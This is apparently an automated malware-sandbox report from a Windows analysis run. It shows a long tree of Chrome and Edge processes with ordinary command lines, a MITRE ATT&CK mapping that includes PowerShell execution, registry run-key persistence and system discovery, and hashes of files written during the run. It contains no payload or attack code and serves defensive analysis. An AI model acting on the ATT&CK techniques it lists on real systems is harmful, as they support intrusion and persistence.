  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  PID:1088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:3884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5164,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:8
  2⤵
  PID:2236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5348,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5048 /prefetch:8
  2⤵
  PID:1580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5360,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4808 /prefetch:8
  2⤵
  PID:5196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5356,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5440 /prefetch:2
  2⤵
  PID:6020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3888,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5020 /prefetch:1
  2⤵
  PID:5720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3212,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:5928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5048,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5532 /prefetch:1
  2⤵
  PID:5940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3560,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5512 /prefetch:1
  2⤵
  PID:5852

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa81ad46f8,0x7ffa81ad4708,0x7ffa81ad4718
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
  2⤵
  PID:2196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
  2⤵
  PID:3384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
  2⤵
  PID:5184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:5368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
  2⤵
  PID:5724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
  2⤵
  PID:5988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
  2⤵
  PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
  2⤵
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
  2⤵
  PID:3112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
  2⤵
  PID:5368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
  2⤵
  PID:5888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
  2⤵
  PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
  2⤵
  PID:5400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:3264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
  2⤵
  PID:4172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:1252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:5612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:6052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
  2⤵
  PID:5148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
  2⤵
  PID:6492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
  2⤵
  PID:6740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
  2⤵
  PID:6976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:6984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
  2⤵
  PID:6352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
  2⤵
  PID:6224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:6304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:1
  2⤵
  PID:6300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:6664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
  2⤵
  PID:6656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7220 /prefetch:1
  2⤵
  PID:7004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
  2⤵
  PID:5956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:1
  2⤵
  PID:6268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:1
  2⤵
  PID:6424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8168 /prefetch:1
  2⤵
  PID:7120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8324 /prefetch:1
  2⤵
  PID:6984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12459561243512567979,7178992060367430861,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8488 /prefetch:1
  2⤵
  PID:3348

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4372

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
471B

MD5
9d0cd5e87696103f2f54a104937b6d25

SHA1
ee37b3aaef78a9cd68dfa6d8fc4cc731c56966d0

SHA256
1f3e06d5348cc8e5de491c4fd926c118298a7f689d38fa5f387bfddd722d1274

SHA512
0d48b45297e5caaef378ece31c6fa36acfe4881b7ab99b4467276dc3f71d0308016ea0fae878e706c63f543ca77d5b10ad41db4b06b28d798686403a093ad266

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
412B

MD5
0cdd64c9fb0e594c67c349a65cf93841

SHA1
8f3543bf2b1fc26e8dc68582e1eb39e6e6466be0

SHA256
f6cf37c8ebb1e3baee31d57f223fea24907016070e7f864c863eb44b696c00d1

SHA512
e4c1964e2858668a73f69db174a5c597bf25b43e3ff36b4728e2ccacd0508f0aebd6d62aaead790f2fb4eced5cee94cccd7e9dc36cf57bd6a6b55ffb183a7d4c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
9602041a2cb8cf761290b2a84747ccf2

SHA1
19fb4787bf855ac2af4087fb1285ed0e332e9bcd

SHA256
3c34be7b8e79cab6968a535caba856c5e49dcfa66d901be199596e320c327281

SHA512
1fdcd9378fd1e273978fa34ef27a4ed1de9feb0c9c4a285eccfba6b4221276fa954ac3de428e2dda370c791db8e5f954f512bc70a5a699efabbe4a7c9fd3eae6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
e579aca9a74ae76669750d8879e16bf3

SHA1
0b8f462b46ec2b2dbaa728bea79d611411bae752

SHA256
6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

SHA512
df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

Filesize
41KB

MD5
503766d5e5838b4fcadf8c3f72e43605

SHA1
6c8b2fa17150d77929b7dc183d8363f12ff81f59

SHA256
c53b8a39416067f4d70c21be02ca9c84724b1c525d34e7910482b64d8e301cf9

SHA512
5ead599ae1410a5c0e09ee73d0fdf8e8a75864ab6ce12f0777b2938fd54df62993767249f5121af97aa629d8f7c5eae182214b6f67117476e1e2b9a72f34e0b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
175c54c9f7b444af680cba587bb50eeb

SHA1
025fb02121bea63b95adfe2c98b04596df8cd485

SHA256
a4ba3f729be5e1bc3f6876307d12c787bb568bd0834048ab9f65731f92bc99aa

SHA512
8c5a1c461ddf6d343f021ae26bc4da7963fe6d09a831c19e087d5d42ce406d009a113bdb21dd397c85bd6a6b9b449d9ab1cf3894730bda0a60225c1ed1994810

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
2c69672be243f061a79875c71d076b19

SHA1
960a5e6058eced868ddf3da681c8b40466fe4a48

SHA256
b77b5231d39656c15121e8a70708933143da6b48ae2bc860a7247f572bfc3c4e

SHA512
3f55a7f6c13ea769485d20ad882eb35e006cbc21597c380d51dadae7c6cb210398829f7ff713cab58af6b53e62b1ab0257cddb41767fe5ab39cc22de2bb5473e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
e214a756a4084d6865bb65c0a9497956

SHA1
2f73aef2487731ec96c17d106b2c02a4aa2272cc

SHA256
3bfeecc6fba76b1d3aee0ccbe0a855f57698f200d2675d0fdf2ef11b5d4fd22a

SHA512
a3230db2231bc9e0d45720d884c321885c519f15f52701e277006d17261da2601c20ad68d8ef30bc98385e8b7865e6babd78ba4cbaf2861130900cd34d469858

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
62953409b3e33fd87201fa55904db8b5

SHA1
50d67b3d179b576e8ee25eb7bf54f4df3aeedbd5

SHA256
